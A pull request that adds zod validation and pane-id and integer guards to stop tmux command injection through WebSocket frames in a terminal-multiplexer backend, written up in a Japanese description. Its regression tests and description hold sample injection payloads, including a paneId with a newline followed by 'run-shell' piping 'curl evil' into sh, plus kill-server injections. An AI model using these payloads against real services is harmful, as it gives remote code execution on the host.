### PR TITLE
fix(terminal-mux): WS制御フレームをtmuxコマンド補間前にzod検証 (#231)

### DIFF
--- a/backend/src/routes/terminal-mux.ts
+++ b/backend/src/routes/terminal-mux.ts
@@ -8,6 +8,7 @@ import type {
   MuxClientMessage,
   ConversationMessage,
 } from '../../../shared/types';
+import { MuxClientMessageSchema } from '../../../shared/types';
 import { buildSessionsList } from './sessions';
 import { resolveViewportCursorPolicy, type ViewportCursorPolicy } from '../services/viewport-cursor-policy';
 
@@ -160,12 +161,19 @@ export async function muxOpen(ws: ServerWebSocket<MuxData>) {
 export async function muxMessage(ws: ServerWebSocket<MuxData>, message: string | Buffer) {
   if (typeof message !== 'string') return;
 
-  let msg: MuxClientMessage;
+  let raw: unknown;
   try {
-    msg = JSON.parse(message);
+    raw = JSON.parse(message);
   } catch {
     return;
   }
+
+  // Validate the frame before any field reaches a tmux control-mode command.
+  // Invalid/unknown frames (incl. paneId or cols/rows injection attempts) are
+  // dropped here. #231.
+  const parsed = MuxClientMessageSchema.safeParse(raw);
+  if (!parsed.success) return;
+  const msg = parsed.data as MuxClientMessage;
 
   if (msg.type === 'subscribe') {
     await handleSubscribe(ws, msg.sessionId);

--- a/backend/src/services/pane-viewport.ts
+++ b/backend/src/services/pane-viewport.ts
@@ -19,7 +19,7 @@
  */
 
 import type { PaneViewport, PaneCursor, PaneModes } from '../../../shared/types';
-import type { TmuxControlSession } from './tmux-control';
+import { type TmuxControlSession, assertPaneId } from './tmux-control';
 import {
   computeCursorPadShift,
   resolveViewportCursor,
@@ -131,6 +131,7 @@ async function captureScrollback(
   wanted: number,
 ): Promise<string[]> {
   if (wanted <= 0) return [];
+  assertPaneId(paneId);
   try {
     const raw = await cs.sendCommand(
       `capture-pane -e -p -t ${paneId} -S -${wanted} -E -1`,
@@ -161,6 +162,7 @@ export async function captureViewport(
   offset: number,
   cursorPolicy: ViewportCursorPolicy = 'default',
 ): Promise<PaneViewport | null> {
+  assertPaneId(paneId);
   let metaRaw: string;
   try {
     metaRaw = await cs.sendCommand(

--- a/backend/src/services/tmux-control.ts
+++ b/backend/src/services/tmux-control.ts
@@ -34,6 +34,30 @@ const RESIZE_DEBOUNCE_MS = 50;
 // listSessions / dashboard fan-out).
 const GRACE_PERIOD_MS = 30_000;
 
+// Defense-in-depth guards for values interpolated into tmux control-mode
+// command strings. tmux parses its stdin line-by-line, so an argument
+// containing a newline injects an arbitrary command (run-shell etc. = host
+// RCE). Every command method validates its identifiers/numbers before
+// building the command, regardless of how it was reached (WS, REST, future
+// callers). The /ws/mux dispatch also validates frames up front (#231), but
+// these sink-level checks are the authoritative backstop.
+const PANE_ID_RE = /^%\d+$/;
+const PANE_DIRECTIONS = new Set(['L', 'R', 'U', 'D']);
+
+export function assertPaneId(paneId: string): void {
+  if (typeof paneId !== 'string' || !PANE_ID_RE.test(paneId)) {
+    throw new Error(`Invalid pane id: ${JSON.stringify(paneId)}`);
+  }
+}
+
+function toSafeInt(value: unknown, min: number, max: number, label: string): number {
+  const n = typeof value === 'number' ? value : Number(value);
+  if (!Number.isInteger(n) || n < min || n > max) {
+    throw new Error(`Invalid ${label}: ${JSON.stringify(value)}`);
+  }
+  return n;
+}
+
 interface PendingCommand {
   resolve: (output: string) => void;
   reject: (error: Error) => void;
@@ -602,6 +626,7 @@ export class TmuxControlSession {
    * Data is a Buffer of raw bytes to send.
    */
   async sendInput(paneId: string, data: Buffer): Promise<void> {
+    assertPaneId(paneId);
     // Chunk data for send-keys -H
     for (let offset = 0; offset < data.length; offset += SEND_KEYS_CHUNK_SIZE) {
       const chunk = data.subarray(offset, offset + SEND_KEYS_CHUNK_SIZE);
@@ -618,6 +643,7 @@ export class TmuxControlSession {
    * Split a pane.
    */
   async splitPane(paneId: string, direction: 'h' | 'v'): Promise<void> {
+    assertPaneId(paneId);
     const flag = direction === 'h' ? '-h' : '-v';
     await this.sendCommand(`split-window ${flag} -t ${paneId}`);
   }
@@ -626,6 +652,7 @@ export class TmuxControlSession {
    * Close a pane. Refuses to close the last remaining pane.
    */
   async closePane(paneId: string): Promise<void> {
+    assertPaneId(paneId);
     const panes = await this.listPanes();
     if (panes.length <= 1) {
       throw new Error('Cannot close the last pane');
@@ -637,6 +664,7 @@ export class TmuxControlSession {
    * Respawn a dead pane (restart the process).
    */
   async respawnPane(paneId: string): Promise<void> {
+    assertPaneId(paneId);
     await this.sendCommand(`respawn-pane -t ${paneId}`);
   }
 
@@ -644,14 +672,22 @@ export class TmuxControlSession {
    * Resize a specific pane.
    */
   async resizePane(paneId: string, cols: number, rows: number): Promise<void> {
-    await this.sendCommand(`resize-pane -t ${paneId} -x ${cols} -y ${rows}`);
+    assertPaneId(paneId);
+    const c = toSafeInt(cols, 1, 2000, 'cols');
+    const r = toSafeInt(rows, 1, 2000, 'rows');
+    await this.sendCommand(`resize-pane -t ${paneId} -x ${c} -y ${r}`);
   }
 
   /**
    * Adjust pane size relatively (L=narrower, R=wider, U=shorter, D=taller).
    */
   async adjustPaneSize(paneId: string, direction: 'L' | 'R' | 'U' | 'D', amount: number): Promise<void> {
-    await this.sendCommand(`resize-pane -t ${paneId} -${direction} ${amount}`);
+    assertPaneId(paneId);
+    if (!PANE_DIRECTIONS.has(direction)) {
+      throw new Error(`Invalid pane direction: ${JSON.stringify(direction)}`);
+    }
+    const amt = toSafeInt(amount, 1, 2000, 'amount');
+    await this.sendCommand(`resize-pane -t ${paneId} -${direction} ${amt}`);
   }
 
   /**
@@ -666,6 +702,7 @@ export class TmuxControlSession {
    * Select (focus) a pane.
    */
   async selectPane(paneId: string): Promise<void> {
+    assertPaneId(paneId);
     await this.sendCommand(`select-pane -t ${paneId}`);
   }
 
@@ -676,6 +713,7 @@ export class TmuxControlSession {
    * - If not zoomed: zoom the target pane
    */
   async zoomPane(paneId: string): Promise<void> {
+    assertPaneId(paneId);
     const zoomFlag = await this.sendCommand('display-message -p "#{window_zoomed_flag}"');
     const isZoomed = zoomFlag.trim() === '1';
     if (isZoomed) {
@@ -702,14 +740,16 @@ export class TmuxControlSession {
    */
   private async applyClientSize(cols: number, rows: number): Promise<void> {
     try {
+      const c = toSafeInt(cols, 1, 2000, 'cols');
+      const r = toSafeInt(rows, 1, 2000, 'rows');
       // Sequential, not Promise.all: tmux -CC has a single FIFO for command
       // responses, and overlapping sends corrupt the parsing (the second
       // command's bytes can interleave with the first command's response
       // window, producing "unknown command" errors).
-      await this.sendCommand(`refresh-client -C ${cols}x${rows}`);
-      await this.sendCommand(`resize-window -t ${this.sessionId} -x ${cols} -y ${rows}`);
+      await this.sendCommand(`refresh-client -C ${c}x${r}`);
+      await this.sendCommand(`resize-window -t ${this.sessionId} -x ${c} -y ${r}`);
     } catch {
-      // Ignore resize errors
+      // Ignore resize errors (incl. rejected out-of-range dimensions)
     }
   }
 

--- a/backend/tests/unit/ws-message-validation.test.ts
+++ b/backend/tests/unit/ws-message-validation.test.ts
@@ -1,0 +1,85 @@
+import { describe, expect, test } from 'bun:test';
+import { MuxClientMessageSchema } from '../../../shared/types';
+import { assertPaneId } from '../../src/services/tmux-control';
+
+// Regression for #231: the /ws/mux dispatch must validate every frame before
+// any field reaches a tmux control-mode command. paneId/cols/rows are
+// interpolated into command strings written to tmux stdin, which parses
+// line-by-line — a newline in an argument injects an arbitrary command (RCE).
+
+describe('MuxClientMessageSchema', () => {
+  test('accepts valid control + subscription frames', () => {
+    const valid = [
+      { type: 'subscribe', sessionId: 's1' },
+      { type: 'unsubscribe', sessionId: 's1' },
+      { type: 'subscribe-conversation', sessionId: 's1' },
+      { type: 'input', sessionId: 's1', paneId: '%0', data: 'aGk=' },
+      { type: 'resize', sessionId: 's1', cols: 80, rows: 24 },
+      { type: 'split', sessionId: 's1', paneId: '%1', direction: 'h' },
+      { type: 'close-pane', sessionId: 's1', paneId: '%2' },
+      { type: 'resize-pane', sessionId: 's1', paneId: '%0', cols: 100, rows: 40 },
+      { type: 'select-pane', sessionId: 's1', paneId: '%3' },
+      { type: 'adjust-pane', sessionId: 's1', paneId: '%0', direction: 'L', amount: 5 },
+      { type: 'equalize-panes', sessionId: 's1', direction: 'horizontal' },
+      { type: 'zoom-pane', sessionId: 's1', paneId: '%0' },
+      { type: 'respawn-pane', sessionId: 's1', paneId: '%0' },
+      { type: 'request-viewport', sessionId: 's1', paneId: '%0', offset: 0 },
+      { type: 'ping', sessionId: '', timestamp: 123 },
+      { type: 'client-info', sessionId: 's1', deviceType: 'tablet' },
+    ];
+    for (const frame of valid) {
+      expect(MuxClientMessageSchema.safeParse(frame).success).toBe(true);
+    }
+  });
+
+  test('rejects paneId carrying a tmux command-injection newline', () => {
+    const evil = { type: 'select-pane', sessionId: 's1', paneId: "%0\nrun-shell 'curl evil|sh'" };
+    expect(MuxClientMessageSchema.safeParse(evil).success).toBe(false);
+  });
+
+  test('rejects non-pattern paneId', () => {
+    for (const paneId of ['0', 'pane0', '%', '%0; ls', '%0 ', '']) {
+      const r = MuxClientMessageSchema.safeParse({ type: 'select-pane', sessionId: 's1', paneId });
+      expect(r.success).toBe(false);
+    }
+  });
+
+  test('rejects string cols/rows (JSON.parse does not enforce the number type)', () => {
+    const evil = { type: 'resize', sessionId: 's1', cols: '1\nkill-server', rows: 24 };
+    expect(MuxClientMessageSchema.safeParse(evil).success).toBe(false);
+  });
+
+  test('rejects out-of-range and non-integer dimensions', () => {
+    expect(MuxClientMessageSchema.safeParse({ type: 'resize', sessionId: 's1', cols: 0, rows: 24 }).success).toBe(false);
+    expect(MuxClientMessageSchema.safeParse({ type: 'resize', sessionId: 's1', cols: 80, rows: 24.5 }).success).toBe(false);
+    expect(MuxClientMessageSchema.safeParse({ type: 'resize', sessionId: 's1', cols: 999999, rows: 24 }).success).toBe(false);
+  });
+
+  test('rejects unknown bad direction', () => {
+    expect(MuxClientMessageSchema.safeParse({ type: 'adjust-pane', sessionId: 's1', paneId: '%0', direction: 'X', amount: 1 }).success).toBe(false);
+    expect(MuxClientMessageSchema.safeParse({ type: 'split', sessionId: 's1', paneId: '%0', direction: 'z' }).success).toBe(false);
+  });
+
+  test('rejects unknown message type', () => {
+    expect(MuxClientMessageSchema.safeParse({ type: 'kill-server', sessionId: 's1' }).success).toBe(false);
+  });
+
+  test('strips unknown extra keys (forward-compatible clients)', () => {
+    const r = MuxClientMessageSchema.safeParse({ type: 'select-pane', sessionId: 's1', paneId: '%0', futureField: 1 });
+    expect(r.success).toBe(true);
+    if (r.success) expect('futureField' in r.data).toBe(false);
+  });
+});
+
+describe('assertPaneId (sink-level backstop)', () => {
+  test('accepts %<digits>', () => {
+    expect(() => assertPaneId('%0')).not.toThrow();
+    expect(() => assertPaneId('%42')).not.toThrow();
+  });
+
+  test('throws on injection / malformed pane ids', () => {
+    for (const bad of ["%0\nkill-server", '%0; ls', 'pane', '%', '', '%0 ']) {
+      expect(() => assertPaneId(bad)).toThrow();
+    }
+  });
+});

--- a/shared/types.ts
+++ b/shared/types.ts
@@ -663,6 +663,40 @@ export type MuxClientMessage =
   | { type: 'unsubscribe-conversation'; sessionId: string }
   | (ControlClientMessage & { sessionId: string });
 
+// Runtime validation for client→server /ws/mux frames. The unions above are
+// compile-time only; the WS handler receives untrusted JSON and interpolates
+// paneId/cols/rows into tmux control-mode command strings, so every frame is
+// validated here before dispatch (#231). Unknown keys are stripped (zod
+// default), so forward-compatible clients are unaffected.
+const WsPaneDim = z.number().int().min(1).max(2000);
+const WsAmount = z.number().int().min(1).max(2000);
+const WsOffset = z.number().int().min(0).max(10_000_000);
+
+const controlClientMessageOptions = [
+  z.object({ type: z.literal('input'), paneId: PaneIdSchema, data: z.string() }),
+  z.object({ type: z.literal('resize'), cols: WsPaneDim, rows: WsPaneDim }),
+  z.object({ type: z.literal('split'), paneId: PaneIdSchema, direction: z.enum(['h', 'v']) }),
+  z.object({ type: z.literal('close-pane'), paneId: PaneIdSchema }),
+  z.object({ type: z.literal('resize-pane'), paneId: PaneIdSchema, cols: WsPaneDim, rows: WsPaneDim }),
+  z.object({ type: z.literal('select-pane'), paneId: PaneIdSchema }),
+  z.object({ type: z.literal('ping'), timestamp: z.number() }),
+  z.object({ type: z.literal('client-info'), deviceType: z.enum(['mobile', 'tablet', 'desktop']) }),
+  z.object({ type: z.literal('adjust-pane'), paneId: PaneIdSchema, direction: z.enum(['L', 'R', 'U', 'D']), amount: WsAmount }),
+  z.object({ type: z.literal('equalize-panes'), direction: z.enum(['horizontal', 'vertical']) }),
+  z.object({ type: z.literal('zoom-pane'), paneId: PaneIdSchema }),
+  z.object({ type: z.literal('respawn-pane'), paneId: PaneIdSchema }),
+  z.object({ type: z.literal('request-viewport'), paneId: PaneIdSchema, offset: WsOffset }),
+] as const;
+
+export const MuxClientMessageSchema = z.discriminatedUnion('type', [
+  z.object({ type: z.literal('subscribe'), sessionId: z.string().min(1) }),
+  z.object({ type: z.literal('unsubscribe'), sessionId: z.string().min(1) }),
+  z.object({ type: z.literal('subscribe-conversation'), sessionId: z.string().min(1) }),
+  z.object({ type: z.literal('unsubscribe-conversation'), sessionId: z.string().min(1) }),
+  // Control frames carry a sessionId in the mux protocol (ping may send "").
+  ...controlClientMessageOptions.map((o) => o.extend({ sessionId: z.string() })),
+]);
+
 // Server → Client messages for /ws/mux
 export type MuxServerMessage =
   | { type: 'subscribed'; sessionId: string }


### PR DESCRIPTION
## 概要
`/ws/mux` ハンドラが bare `JSON.parse` + cast のみで実行時検証せず、`paneId`/`cols`/`rows` を tmux control-mode コマンド文字列へ生補間していた問題を修正（#231, Critical RCE）。tmux は stdin を行単位で解釈するため、改行入り `paneId`（例 `%0\nrun-shell 'curl evil|sh'`）や文字列型 `cols` で任意 tmux コマンドを注入でき、ホスト RCE になっていた。REST 経路は `PaneIdSchema`/`ResizeTerminalSchema` で検証済みだが WS 経路は未検証だった。

## 変更（2層）
- **shared/types.ts**: `MuxClientMessageSchema`（zod discriminatedUnion）を追加。`muxMessage` で `safeParse` し、不正/未知フレームを drop。未知キーは strip（前方互換）。
- **tmux-control.ts**: `assertPaneId`(`/^%\d+$/`) と整数ガードを各コマンド sink（sendInput/split/close/respawn/resize/adjust/select/zoom/applyClientSize）に追加。`pane-viewport.ts` の capture にも適用。呼び出し元に依らない最終防壁。

## 検証
- backend 全 197 テスト pass、新規 `ws-message-validation.test.ts`(10件) 追加（有効フレーム通過 / paneId改行・文字列cols・範囲外・不正direction・未知typeを reject / 未知キーstrip / assertPaneId）
- lint / typecheck pass
- **dev 実機（隔離tmuxセッション）**:
  - 回帰: subscribe/resize/select-pane/request-viewport/input が正常動作、viewport 更新を確認、`input` フレームがペインに到達（`echo CCHUB231_OK` 反映）、エラー 0
  - セキュリティ: `paneId` 改行注入＋文字列 `cols` 注入とも drop され**実行されず**（注入マーカー未設定）、tmux サーバ無傷

Closes #231

🤖 Generated with [Claude Code](https://claude.com/claude-code)